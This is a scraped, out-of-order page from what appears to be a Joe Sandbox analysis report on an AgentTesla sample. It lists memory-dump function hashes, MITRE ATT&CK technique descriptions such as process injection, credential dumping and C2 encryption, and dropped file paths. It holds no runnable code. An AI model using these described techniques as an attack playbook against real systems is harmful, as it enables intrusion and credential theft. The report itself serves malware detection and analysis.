Instruction Fuzzy Hash: CED01220A28F294BDAB4BF7890557E6B1E4FB18314F400A69D45AC3589DF6CA98947C0

Function 00007FFD3468EF14 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3468B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3468B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3468b000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6bf2af1cdbf3c643f8688584e8bf816c46e470c965a15408979ad282796f58
Instruction ID: 69e0c4617278a03aa0a2f727bcac080b618850e2929731ac0e1ef0d1d5988e04
Opcode Fuzzy Hash: fe6bf2af1cdbf3c643f8688584e8bf816c46e470c965a15408979ad282796f58
Instruction Fuzzy Hash: F4D0A79298EAD95FE7D6B69898698B43BD0CF1B21130504FBD1AACB1B3C40C9CC28342

Function 00007FFD346603C0 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3465d000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46f0e5e825855e5aeb6073699f9a69ed60321ab4e8a80853fdbbc00150489be3
Instruction ID: f6a2bbc3df4a0f6bee6a3ed0c4cb9b8a110961f387fb5870e0832c6185ace89c
Opcode Fuzzy Hash: 46f0e5e825855e5aeb6073699f9a69ed60321ab4e8a80853fdbbc00150489be3
Instruction Fuzzy Hash: 34D05B41B11E4557F748AB3A0C9D2A036C2E799515F8481759405C6386DD1CA8954744

Function 00007FFD34669D2D Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3465D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3465D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3465d000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d51aa8a1647bc3da1067fef74e579109bc9cea4d8a98fed9dcbab0e453513da1
Instruction ID: eb31b65bdb29894529bd9f70032c616b77d9c3e55ffdcca67fb0448d2282bdad
Opcode Fuzzy Hash: d51aa8a1647bc3da1067fef74e579109bc9cea4d8a98fed9dcbab0e453513da1
Instruction Fuzzy Hash: C1C01213F0CC2606F96518AD7CF21FCA3C1E786571B501277DA5AC2285DC0D18861682

Function 00007FFD3468EF38 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000018.00000002.2478986710.00007FFD3468B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3468B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_7ffd3468b000_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9beae3599aec4512ac1778af55967c6621314bb7078fd2d278ef02231bdc9a9
Instruction ID: 55efaa218b8ba0427261d9236a1b4a9864df9508a9bc69fd7d768bf585013956
Opcode Fuzzy Hash: a9beae3599aec4512ac1778af55967c6621314bb7078fd2d278ef02231bdc9a9
Instruction Fuzzy Hash: 77C08016F1CC790BE7F5A65D28D11F469C0E74D130B1441E5E65CC1147D84D5CD643C3

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LisectAVT_2403002A_29.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Networking

System Summary

Persistence and Installation Behavior

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.log

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_dae5beae797db3ecbb8fa0e3475fee7a94437a_7c70d214_3cc1fd1a-b0cd-4737-9eb1-8abc11b81acf\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_dae5beae797db3ecbb8fa0e3475fee7a94437a_7c70d214_53517162-9d0a-4a4e-8846-387dccff8f9e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_dae5beae797db3ecbb8fa0e3475fee7a94437a_7c70d214_8052cdf5-e893-4404-94d0-50bb24e27abc\Report.wer

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_svchost.exe_dae5beae797db3ecbb8fa0e3475fee7a94437a_7c70d214_dfc11d99-f50b-48ba-81f2-80667f6ca4c0\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB0D8.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WERB388.tmp.WERInternalMetadata.xml

Windows Analysis Report
LisectAVT_2403002A_29.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre